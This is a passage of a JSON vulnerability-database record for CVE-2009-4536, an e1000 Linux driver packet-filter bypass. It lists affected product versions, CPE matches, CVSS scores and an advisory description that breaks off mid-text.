      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.22"
      },
      {
        "model": "kernel -pre3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "hat enterprise linux as 4.7.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "red",
        "version": null
      },
      {
        "model": "linux lts lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.20"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.36.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.3"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.1"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.3"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "kernel 2.6.21-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -git13",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel -test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "enterprise linux 5.3.z server",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "hat enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "4"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel -pre2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel 2.6.21-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.26-rc5-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel .0-test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33.6"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.10"
      },
      {
        "model": "kernel 2.6.21-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.37.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.11"
      },
      {
        "model": "kernel -test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.332"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.36.6"
      },
      {
        "model": "kernel .0-test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2519"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "river systems linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "wind",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "desktop video device",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.0"
      },
      {
        "model": "intuity audix lx sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "linux enterprise server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "kernel .0-test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.37.9"
      },
      {
        "model": "kernel -test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "linux enterprise desktop sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -pre9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "vma rhel5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.3"
      },
      {
        "model": "hat enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "5"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1613"
      },
      {
        "model": "esxi server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.37.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel pre-1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel 2.6.29-rc2-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.34.6"
      },
      {
        "model": "kernel 2.6.32-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel -ow1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "novell linux pos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux armel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33.3"
      },
      {
        "model": "kernel -pre6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.36.9"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "esxi server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.16"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.276"
      },
      {
        "model": "kernel 2.6.31-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "intuity audix lx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.17"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel pre7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1627"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.12"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel pre-7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "messaging storage server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel -test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux enterprise high availability extension",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "37519"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001004"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-076"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4536"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.6.32.3",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-4536"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Fabian Yamaguchi",
    "sources": [
      {
        "db": "BID",
        "id": "37519"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-076"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2009-4536",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2009-4536",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-41982",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2009-4536",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201001-076",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-41982",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2009-4536",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-41982"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4536"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001004"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-076"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4536"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "drivers/net/e1000/e1000_main.c in the e1000 driver in the Linux kernel 2.6.32.3 and earlier handles Ethernet frames that exceed the MTU by processing certain trailing payload data as if it were a complete frame, which allows remote attackers to bypass packet filters via a large packet with a crafted payload.  NOTE: this vulnerability exists because of an incorrect fix for CVE-2009-1385. The Linux e1000 driver is prone to a security-bypass vulnerability. \nAn attacker can exploit this issue to cause network traffic to be misinterpreted, which may allow the attacker to bypass intended security restrictions or launch further attacks. \nNOTE: A related vulnerability is documented as BID 35185 (Linux Kernel \u0027e1000/e1000_main.c\u0027 Remote Denial of Service Vulnerability), but that issue doesn\u0027t address all possible scenarios. The Linux kernel is the kernel used by the open source operating system Linux released by the American Linux Foundation. The NFSv4 implementation is one of the distributed file system protocols.  Although\nsecurity support for \u0027etch\u0027 officially ended on Feburary 15th, 2010,\nthis update was already in preparation before that date.  The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2009-2691\n\n    Steve Beattie and Kees Cook reported an information leak in the\n    maps and smaps files available under /proc. Local users may be\n    able to read this data for setuid processes while the ELF binary\n    is being loaded. \n\nCVE-2009-2695\n\n    